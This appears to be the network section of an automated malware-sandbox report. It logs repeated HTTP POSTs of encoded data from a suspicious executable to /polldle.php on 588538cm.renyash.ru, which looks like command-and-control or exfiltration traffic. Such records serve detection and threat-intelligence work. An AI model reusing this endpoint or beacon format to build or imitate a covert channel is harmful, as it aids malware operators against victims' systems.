                                                                                Jan 11, 2025 23:34:01.395498037 CET1608OUTData Raw: 5d 5c 51 54 5a 47 5f 5b 54 5d 55 5a 50 5c 59 5c 50 51 5a 53 57 5d 50 5d 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]\QTZG_[T]UZP\Y\PQZSW]P][\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU , 5%($%1_3* <![; +,32U%-' \",+5#X'/\/4
                                                                                Jan 11, 2025 23:34:01.494530916 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:01.742192030 CET950INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:01 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vv4PPtIojvLU64MpEIBAzSzNd2t9b%2FDhoHwA5A4m5ESaX9lzla5nhKQihyy3pxEegiamXCsIGmS8mquJFBoDUc4vV9Hiv0NwaELLdOI1gA2WLqwX1xrzJmoFQFJiBWkLo4USvxz1"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f2f18638c29-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=8691&min_rtt=2025&rtt_var=14093&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1927&delivery_rate=26372&cwnd=188&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 39 38 0d 0a 0e 11 2d 0b 33 1a 30 5c 3d 39 33 12 39 3b 33 5d 2e 31 33 00 2a 0f 3a 5d 23 00 28 58 31 1c 38 53 3c 2a 0f 40 3f 03 27 1c 34 3d 22 56 31 39 23 46 0c 1d 22 5d 3e 2f 0d 0b 31 02 24 5d 3c 0d 00 58 32 32 20 42 29 24 0d 54 29 39 26 00 23 3f 22 50 2b 0c 07 51 3e 1b 25 02 2f 21 33 59 25 2a 2e 51 0f 16 21 1c 21 57 3f 07 23 13 3f 1a 32 0e 3c 00 2b 27 24 13 32 3a 06 53 28 33 2d 02 2b 32 01 09 27 3e 3f 56 26 59 25 06 3f 07 2c 0e 29 2b 24 5c 23 0f 28 56 05 3f 5b 4d 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 98-30\=939;3].13*:]#(X18S<*@?'4="V19#F"]>/1$]<X22 B)$T)9&#?"P+Q>%/!3Y%*.Q!!W?#?2<+'$2:S(3-+2'>?V&Y%?,)+$\#(V?[M0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                86192.168.2.450094104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:34:01.379952908 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:01.739523888 CET2504OUTData Raw: 58 5a 54 5e 5f 45 5a 58 54 5d 55 5a 50 59 59 51 50 56 5a 5c 57 53 50 5f 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XZT^_EZXT]UZPYYQPVZ\WSP_[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#G:U&%;%":%?5#?%Y88#X?7$39-#!2<#X'/\/0
                                                                                Jan 11, 2025 23:34:01.843219042 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:02.081406116 CET801INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:02 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4dVDmfnETvfQz0OcpsP0kl3UhXc9zrM4jp1YY7KvhHebpg2pSLLG2SERXE6uBloq02J3jcBe9W5dQCJYByZHcX3W7mauWSb%2F4VBrYHhRaDsZCcNFYQ7sCHzY51NShs3WV9F53AIh"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f313b72436c-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=8339&min_rtt=1798&rtt_var=13757&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=26971&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                87192.168.2.450095104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:34:02.210563898 CET295OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Jan 11, 2025 23:34:02.567572117 CET2504OUTData Raw: 58 5b 54 50 5f 45 5a 5a 54 5d 55 5a 50 5e 59 58 50 52 5a 5c 57 50 50 5a 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: X[TP_EZZT]UZP^YXPRZ\WPPZ[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU :0%%$&"Y3?"41Y/<</#&9:?!0?#X'/\/,
                                                                                Jan 11, 2025 23:34:02.683669090 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:02.847615957 CET805INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:02 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NLukmRKPfdlFQMNl6gM5WZiGfVLmBX32x74KK53ejlespFkrD7DhyXfvS7ky4YIAjozguhHCfgtwtHlGL%2FTP1vwWUfnBtSvnGiCC3%2BMaF2gY38vsN%2FvwqDOdVGbf75B9xa2MnfkI"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f367dfb8ce6-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3642&min_rtt=2371&rtt_var=3432&sent=4&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2799&delivery_rate=116399&cwnd=161&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                88192.168.2.450096104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:34:02.976263046 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:03.333043098 CET2504OUTData Raw: 58 59 54 56 5a 47 5a 5b 54 5d 55 5a 50 5b 59 5b 50 54 5a 5b 57 54 50 5d 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XYTVZGZ[T]UZP[Y[PTZ[WTP][\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU -&+'%&%?. %_-;/(/R1#W9$$[",?#X'/\/
                                                                                Jan 11, 2025 23:34:03.431459904 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:03.666830063 CET808INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:03 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5C6DSKI2b4ufw7TXCkVYIBLN78g%2B%2Ba4N%2BpwLZ2IbYMYULJymft5H6MPGi2XcAxWH%2FdZIYTRcQkeiRdXolSS2EJYbXV7p49mGVvwgeExA2hJD3tz5yB10NO5thsB5%2Bk4RUhNO4SZo"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f3b2cd9422d-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4798&min_rtt=1688&rtt_var=6853&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=54949&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                89192.168.2.450097104.21.38.8480
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:34:03.786720037 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:04.145536900 CET2504OUTData Raw: 58 5c 54 54 5f 46 5a 58 54 5d 55 5a 50 5b 59 58 50 5c 5a 5f 57 56 50 5f 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: X\TT_FZXT]UZP[YXP\Z_WVP_[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#B, .$80&"\$?*4X,+71-944Z"+Y+%#X'/\/
                                                                                Jan 11, 2025 23:34:04.233973980 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:04.395659924 CET807INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:04 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6YBnhoqbsFJMRShHslYWAxjLZobPr5PkmDLqiuG%2BnfOAdlgJNwrJR5TkztbSd5rB5UCl3xrcVkH8io%2BUFq39w6fdZyvN31OqgugpQLDEgKM%2BwVHAOIQXiW5MTc%2Fny7CaxdoVl35Z"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f403ef043ee-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2244&min_rtt=1716&rtt_var=1699&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=245749&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                90192.168.2.450098104.21.38.8480
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:34:04.523776054 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:04.879851103 CET2504OUTData Raw: 5d 5b 51 50 5f 41 5a 59 54 5d 55 5a 50 58 59 5c 50 55 5a 52 57 52 50 5c 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ][QP_AZYT]UZPXY\PUZRWRP\[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU ,3C2881!:$<-7=_,+<< 1:. 5#+%#X'/\/4
                                                                                Jan 11, 2025 23:34:04.987528086 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:05.222903967 CET812INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:05 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t6BBKA0UaclCtF0ki1I%2FpdxPVr65AzWWhHD89hQC27PvZ61LwqGHzmX4WXK2N4ESj0ctWp0Ye9FlZdK2%2F8DLXxWtJ%2BQ2UQzs1Rvzfsg%2FY40QxmpFgMmM4Aa9nqIcbT%2Bx%2FhL63EH%2B"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f44ecfc8cd4-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4148&min_rtt=1932&rtt_var=5157&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=74247&cwnd=163&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                91192.168.2.450099104.21.38.8480
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:34:05.350532055 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:05.707966089 CET2504OUTData Raw: 58 51 54 52 5f 44 5a 59 54 5d 55 5a 50 5b 59 5a 50 57 5a 5b 57 57 50 5a 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XQTR_DZYT]UZP[YZPWZ[WWPZ[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#B-3&$;31">0"7,!_/88<<&6R.B?!!/(#X'/\/
                                                                                Jan 11, 2025 23:34:05.822393894 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:06.058305025 CET803INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:06 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fcxb8%2BnGc6L1cPiPXlRertmGdk2h4NYxL6BWGF9uBZOlix25R87rDiuIyew3olCCI9hCtKjWMlMZdZ8EpQ4jtvmmBZ0E1ntS8N8RQnV%2FSrWQz7LwIY9w8jPwZOPLw5FvI4u1v8pi"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f4a1fd678e7-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3266&min_rtt=1913&rtt_var=3425&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=114572&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                92192.168.2.450100104.21.38.8480
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:34:06.179019928 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:06.536218882 CET2504OUTData Raw: 58 5d 54 55 5f 43 5a 5b 54 5d 55 5a 50 5a 59 5c 50 5c 5a 5e 57 55 50 5d 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: X]TU_CZ[T]UZPZY\P\Z^WUP][\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#-#5%;?2"'<%7<&/+X?+1 :9<Z52?\(#X'/\/<
                                                                                Jan 11, 2025 23:34:06.635458946 CET25INHTTP/1.1 100 Continue


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                93192.168.2.450101104.21.38.8480
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:34:06.761527061 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 1620
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:07.114298105 CET1620OUTData Raw: 58 50 54 5e 5a 47 5f 5c 54 5d 55 5a 50 5b 59 5f 50 54 5a 5c 57 57 50 56 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XPT^ZG_\T]UZP[Y_PTZ\WWPV[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#. &&;8]&5^35V7?%Z;;'?/1#-,4(#!3]*%#X'/\/
                                                                                Jan 11, 2025 23:34:07.207566977 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:07.456801891 CET957INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:07 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eSfQN7K8wz3GcJfOArGNOWAMkrtiMDKRDDZg6dne3DNmOS7zd%2FGwzH0Vd5w6rUZLifG56y%2FvTboPdX65FVB25UX6Gg%2FaZtw%2BJ3ktnjNfqnATkPxWd%2FWNbCbGeMTUAo4JV33l4Nm8"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f52ca7843bc-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2277&min_rtt=2265&rtt_var=858&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1939&delivery_rate=644591&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 39 38 0d 0a 0e 11 2d 0f 33 1a 0a 5a 29 07 33 5e 39 28 3f 5b 2d 22 2f 02 3d 57 3a 17 23 07 3b 05 27 22 34 57 28 14 2a 1d 3f 3a 09 56 20 3e 00 1f 25 29 23 46 0c 1d 22 5d 29 59 33 08 26 3f 37 04 3f 1d 2a 10 31 0c 24 44 3e 1d 3f 56 29 14 29 1b 21 2c 08 53 28 22 29 56 3d 1c 35 04 2c 31 23 5a 31 3a 2e 51 0f 16 21 50 23 22 3b 05 23 3e 20 01 26 1e 2c 00 29 24 3f 05 24 2a 2c 57 2a 23 2a 10 3c 1c 33 09 27 2e 3c 0c 26 11 3d 07 3c 2a 34 0a 3f 01 24 5c 23 0f 28 56 05 3f 5b 4d 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 98-3Z)3^9(?[-"/=W:#;'"4W(*?:V >%)#F"])Y3&?7?*1$D>?V))!,S(")V=5,1#Z1:.Q!P#";#> &,)$?$*,W*#*<3'.<&=<*4?$\#(V?[M0


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                94192.168.2.450102104.21.38.8480
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:34:06.880975008 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:07.239319086 CET2504OUTData Raw: 5d 59 54 56 5f 41 5f 5c 54 5d 55 5a 50 5a 59 5e 50 51 5a 58 57 52 50 58 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]YTV_A_\T]UZPZY^PQZXWRPX[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#-#:1('225X'Y64Z:8+ )/7U&..]5T'?%#X'/\/<
                                                                                Jan 11, 2025 23:34:07.326798916 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:07.598644972 CET805INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:07 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7v8xuuj9CoKRXeMoCJricpORiVEIYCySC6PHVhT6Xy8BPnBgHITU4wL0DppJH12Ogg8qXt7zB27Cue7gX3K%2BjbZ9KH8exXv%2FNlHJ5wIGEV3tL%2Bf9P9l7wfqOYhtXqyyOa7JKH9Ew"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f538a41efa3-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2589&min_rtt=1990&rtt_var=1945&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=215148&cwnd=121&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
